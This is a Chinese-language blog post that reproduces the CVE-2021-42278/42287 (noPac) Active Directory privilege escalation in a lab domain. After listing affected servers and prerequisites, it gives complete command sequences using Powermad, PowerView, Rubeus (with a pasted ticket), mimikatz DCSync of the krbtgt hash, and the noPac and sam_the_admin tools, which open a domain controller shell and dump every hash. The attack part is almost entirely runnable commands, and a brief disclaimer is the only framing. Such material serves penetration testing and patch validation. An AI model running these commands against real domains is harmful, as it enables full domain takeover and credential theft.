作者: r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x01 漏洞原理

Microsoft Windows Active Directory 域服务权限提升漏洞(CVE-2021-42278、CVE-2021-42287)攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限,造成风险和危害极大。

漏洞情报来源:

1、影响版本

CVE-2021-42278

○ Windows Server 2012 R2○ Windows Server 2012 (Server Core installation)○ Windows Server 2012○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)○ Windows Server 2008 R2 for x64-based Systems Service Pack 1○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)○ Windows Server 2008 for x64-based Systems Service Pack 2○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)○ Windows Server 2008 for 32-bit Systems Service Pack 2○ Windows Server 2016 (Server Core installation)○ Windows Server 2016○ Windows Server, version 20H2 (Server Core Installation)○ Windows Server, version 2004 (Server Core installation)○ Windows Server 2022 (Server Core installation)○ Windows Server 2019 (Server Core installation)○ Windows Server 2022○ Windows Server 2019○ Windows Server 2012 R2 (Server Core installation)

CVE-2021-42287

Windows Server 2012 R2 (Server Core installation)○ Windows Server 2012 R2○ Windows Server 2012 (Server Core installation)○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)○ Windows Server 2012○ Windows Server 2008 R2 for x64-based Systems Service Pack 1○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)○ Windows Server 2008 for x64-based Systems Service Pack 2○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)○ Windows Server 2008 for 32-bit Systems Service Pack 2○ Windows Server 2016 (Server Core installation)○ Windows Server 2016○ Windows Server, version 20H2 (Server Core Installation)○ Windows Server, version 2004 (Server Core installation)○ Windows Server 2022 (Server Core installation)○ Windows Server 2022○ Windows Server 2019 (Server Core installation)○ Windows Server 2019

2、利用条件

(1)一个普通域成员帐户。

(2)域用户有创建机器用户的权限(一般默认权限)。

(3)DC未打补丁KB5008380或KB5008602。

0x02、本地复现

1、普通域成员账户


net user 0x /domain

2、利用 powermad.ps1 新增机器帐号testspn(域用户默认可以新建机器账户)

下载地址:https://github.com/Kevin-Robertson/Powermad

Import-Module .\Powermad.ps1//若报错执行 Set-ExecutionPolicy UnrestrictedNew-MachineAccount -MachineAccount testspn -Domain god.com -DomainController win-2016-dc.god.com -Verbose//密码输入123.com

3、Clear its SPNs(利用PowerView清除SPN信息)

//需要ps1版本impact套件
Import-Module .\PowerView.ps1Set-DomainObject "CN=testspn,CN=Computers,DC=god,DC=com" -Clear 'serviceprincipalname' -Verbose

4、Reset the computer name(利用Powermad重设机器名称)

Set-MachineAccountAttribute -MachineAccount testspn -Value "win-2016-dc" -Attribute samaccountname -Verbose//由于当前DC SPN账户为win-2016-dc$,故要设置为win-2016-dc进行伪造

5、Request TGT (请求TGT)


.\Rubeus.exe asktgt /user:win-2016-dc /password:123.com /domian:god.com /dc:win-2016-dc.god.com /nowrap

6、Change Machine Account samaccountname(还原初始账户属性)

//重新还原机器帐户属性后,现在就可以使用能检索到的TGT请求S4U2self票证来获得使用DC密钥加密的ST,同时还可以将票证中的sname重写为LDAP服务Set-MachineAccountAttribute -MachineAccount testspn -Value "testspn" -Attribute samaccountname -Verbose

7、Request S4U2self(获取票据)

./Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:win-2016-dc.god.com /self /altservice:LDAP/dc.god.com /ptt /ticket:doIE2jCCBNagAwIBBaEDAgEWooID+zCCA/dhggPzMIID76ADAgEFoQkbB0dPRC5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2dvZC5jb22jggO9MIIDuaADAgESoQMCAQKiggOrBIIDp6RFvIPLxffJICEA3lCDUpync5DPJ4Mf6cyuUjXAikFOoWF494NU4vq691SSZluZ07mRL7bLErVohUmHwU/pUu9/WeVrkFNRipVqg81cqq0nxqrTE7I3oZehhJZfJzXK75da4Jaj058agDlMCj9wwFK3Xr+bzWFXTZo7meoYeL2vjJz/2n7Nz55rSUpj3UFuzzG3E7kdRbjj9ppRqZYg+2dxHedSAg3VltoK4s6cDxuapYrm44jMFB/hoH6n8GopuWQEcXN3qQvQwaulWdd4EqPF7tLYyuJ25/enQcHx4ikdXxOwoi2yspl9VIBsO45XxCg6w9QJToCIuf689DnZa3Z3TJocCK6Zs015D8B4VHCA2BrTJd0mUY0vvRX92Eng7VWOeWYIMLid/+IquUy0EBXZ+HmxmX8mMv3cB8oF7SjY5rV0V+3NzVYZVIGwz3O7bdI6jPC9Gl4+7I+thUHXnottJmBMQjU8r7B/Pu+sw5bWr8GHBM2ov4m2+lv/pOiOmtAEkpxW/vgUWEytnnck+gBZ+cLgR1Si+y0Id6Hf6+PQ1kR2x0Q64KRADgddnjZO398UCpJXLwNYHsvu808tkej8bhSjW7UX2gO3kCoEF3746uQod2QDeW/oUuyLPUa5wg/RC2yOYExqFYTHiUPF8iFuW97HBbOErnpG1UPJRjLRvhb61flCOrWY8Bn5MOnHHbOWonQjMq0dsMLeVeZ1smoCbt5DhgCD20IYHX9YjQflgOjQ2Qm/8YQAafiK3uN2Ft/z8YdbQeFnFfSc/6OwkGVNdwK8j7nqwEZpRrhaCYyg0lPwGss1Ml9earLkVyv9KDWNgcJg7PQfbvOeMybU7Z48nhndwmFkyq7lZysiWTx2UxYJ5HCZFJFYoqAuM+kLjXgU3E/zrM52ChHLZH1NGusl0XQJlFSMJX4VVyPEGxuY7rqXnzT64x3XKZFvyGOEC2iCNaRa7tQ73LIvVkQIEB0bpa9UQ/g5c2EgAD2ZCXUErPqOh4Q3XPdlcC5YAx46IkTtH71J8AmpvBeznjtPpAbQquPSp1hresb0uolfYCdUorMDMuSMciPCJDjSD15SCHIN50Yys9QkmJP7fm3/EHBHIg1UbbVUi9/0CdUmA3ywJmV3rBL3ilJ2o9pO1vc6xffakW0Ov3FKcH58t/H7EHlt9Uj39+vZDJYUtc13x3QTNCDbDgaaSqJYTHAUKQaGJ7wBTNr6J/UMPc6RIJoZXil2S5waI1LZo4HKMIHHoAMCAQCigb8Egbx9gbkwgbaggbMwgbAwga2gGzAZoAMCARehEgQQnqAn7dag7TLdcvIPBdyUW6EJGwdHT0QuQ09NohgwFqADAgEBoQ8wDRsLd2luLTIwMTYtZGOjBwMFAEDhAAClERgPMjAyMTEyMTQxNDM0NTNaphEYDzIwMjExMjE1MDAzNDUzWqcRGA8yMDIxMTIyMTE0MzQ1M1qoCRsHR09ELkNPTakcMBqgAwIBAqETMBEbBmtyYnRndBsHZ29kLmNvbQ==


8、获取 kbrtgt 用户的 NTLM Hash

mimikatz.exe
lsadump::dcsync /domain:god.com /user:krbtgt//一句话输出
mimikatz.exe "lsadump::dcsync /domain:god.com /user:krbtgt" exit >dcsync.txt


0x03、工具利用

1、下载地址


#作者使用.NET 3.6框架,因此win7、2008无法使用此exe
https://github.com/cube0x0/noPachttps://github.com/WazeHell/sam-the-admin.githttps://github.com/Ridter/noPac.git

2、实战操作

2.1、扫描探测(noPac.exe)


noPac.exe scan -domain god.com -user test -pass 123456.com

2.2、直接利用一(noPac.exe)


noPac.exe -domain god.com -user test -pass 123456.com /dc win2012.god.com /mAccount test-1 /mPassword passW0rd /service cifs /pttdir \\win2012.god.com\c$



PsExec.exe \\win-2016-dc.god.com cmd.exe

2.3、直接利用二(sam_the_admin.py)

注意⚠️:从域外环境已知域内一个普通用户密码直接拿DC shell或者域内所有hash(IP为访问到)。


python3 sam_the_admin.py god.com/test:'123456.com' -dc-ip 172.20.10.2 -shellpython3 sam_the_admin.py god.com/test:'123456.com' -dc-ip 172.20.10.2 -dump

2.4、直接利用三(noPac.py)

快速使用:

noPac  python3 scanner.py  -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127noPac  python noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127 -shell --impersonate administratorpython3 noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127 --impersonate administrator -dc-host win-2016-dc -dump

Scanner

noPac  python3 scanner.py  -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127


GetST


noPac  python noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127


Auto get shell

noPac  python noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127 -shell --impersonate administrator


Dump hash

//第一种
python3 noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127 --impersonate administrator -dc-host win-2016-dc -dumppython3 noPac.py -use-ldap god.com/test:'1234!QAZ' -dc-ip 10.6.5.127 --impersonate administrator -dc-host win-2016-dc -dump -just-dc-user god.com/krbtgt


参考文章

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

0x04 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!

网络攻防|CVE-2021-42287、CVE-2021-42278域内提权相关推荐

  1. 2021-08-31《内网安全攻防》学习笔记,第二章-域内信息收集(转自PowerLiu)

    <内网安全攻防>学习笔记,第二章-域内信息收集 2020-07-212020-07-21 15:08:47阅读 1.1K0 2.1 内网信息搜集概述 当渗透测试人员进入内网后,面对的是一片 ...

  2. 【转】人工智能在网络攻防领域的应用及问题分析

    算法.数据与算力是人工智能发展的三大核心要素.近些年来,在算法增强.数据爆增及算力提升等多种有利因素的驱动下,人工智能飞速发展并在各行各业得到广泛应用,在网络空间安全领域也不例外.网络攻防对抗不断演化 ...

  3. 《网络攻防》第七周学习总结

    Kali教材学习 本周主要学习了<网络攻防---技术与实践>第7章的内容,主要学习了 Windows操作系统安全攻防         Windows操作系统基本框架 如上图所示,Windo ...

  4. 网络攻防技术与实践笔记-信息收集技术手段

    网络攻防技术与实践笔记(一) 一.网络踩点 1. web搜索与搜索 Google.百度等高级搜索,xgoogle查询工具:wget爬虫工具,Teleport Pro.Offline Explorer爬 ...

  5. 20179311《网络攻防实践》第九周作业

    网络攻防课本第九章总结 1.恶意代码定义 恶意代码指的是使计算机按照攻击者的意图执行以达到恶意目标的指令集.首先恶意代码是一组指令集,恶意代码的实现方式可以多种多样,如二进制执行文件.脚本语言代码.宏 ...

  6. 20179311《网络攻防实践》第七周作业

    1.Windows操作系统的基本结构 分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码.采用宏内核模式来进行构架,这使得任意的内核模块或设备驱动程序都可能破坏其他内核模 ...

  7. 第七届XCTF国际网络攻防联赛总决赛战队巡礼!

    Super Guesser国际联合战队创建于2020年,成立伊始便在HITCON.SECCON.Dragon CTF等大型国际CTF赛事中大放异彩,接连斩获赛事冠军.2021年,Super Guess ...

  8. 《网络攻防实践》 第二周作业

    kali 安装与配置 官网下载最新的kali64位镜像,照视频中步骤安装没有任何问题,甚至连视频中提到的一直回车选择默认选项会遇到的死循环也没有遇到. 不过有一点不知道是不是有些遗憾,kali网络设置 ...

  9. 预见2021:《2021年中国呼叫中心产业全景图谱》 未来十年八大预测

    预见2021:<2021年中国呼叫中心产业全景图谱> 未来十年八大预测 按业务划分来看,呼叫中心的业务大类归到了BPO(商务流程外包)当中.呼叫中心具有高附加值.低碳经济.提高城市服务业水 ...

最新文章

  1. linux 打开文件错误 too many open files 解决 ulimit 简介
  2. 深入探究递归神经网络:大牛级的训练和优化如何修成?
  3. sklearn常见命令和官方文档汇总
  4. 同样是做技术,为什么 Java 能比 C++ 多赚10万?
  5. dom4j-cookbook
  6. UVA - 1589 ​​​​​​​Xiangqi
  7. 浅入浅出 MySQL 索引
  8. SQL Server 2005 Service Broker 初探 [摘抄]
  9. Linux中pts/0的讲解
  10. 跟着我干你技术入股,当面临这样的诱惑,我们该怎么办?
  11. Allegro添加中文字体的简单有效方法
  12. 一次性刻录光盘内容(刻录完成后不能再编辑光盘中内容)
  13. 数组、数组的定义、对数组的理解
  14. 什么情况下应该选用远心镜头
  15. 嘀嗒出行的IPO备战
  16. 算数运算符、算术表达式
  17. 值得收藏的 104个 CSS 面试题
  18. 计算机网络发展史课程论文,计算机网络的发展史论文.doc
  19. UBTC主网上线智能合约以及实现混合共识机制
  20. 手机u盘显示服务器连接超时,U盘插到手机里却没反应?这几种情况你知道么?...

热门文章

  1. Java 视频转换h265、h264、mkv、mp4
  2. 北大惠普金融指数-匹配企业绿色创新指数2011-2020年:企业名称、年份、行业分类等多指标数据
  3. excel表格末尾添加一行_在EXCEL表格中,快速插入多行、多列的技巧
  4. QQ来信息突然没声音了
  5. 简单灵活万用管理软件——蓝点通用管理系统V26破版,手慢无
  6. 人工智能的顶会有哪些
  7. 学习LSM(Linux security module)之四:一个基于LSM的简单沙箱的设计与实现
  8. 华为哪款手机是鸿蒙系统_华为鸿蒙系统不会用于手机?
  9. CSS3之边框图片border-image
  10. 综合布线 、 子网划分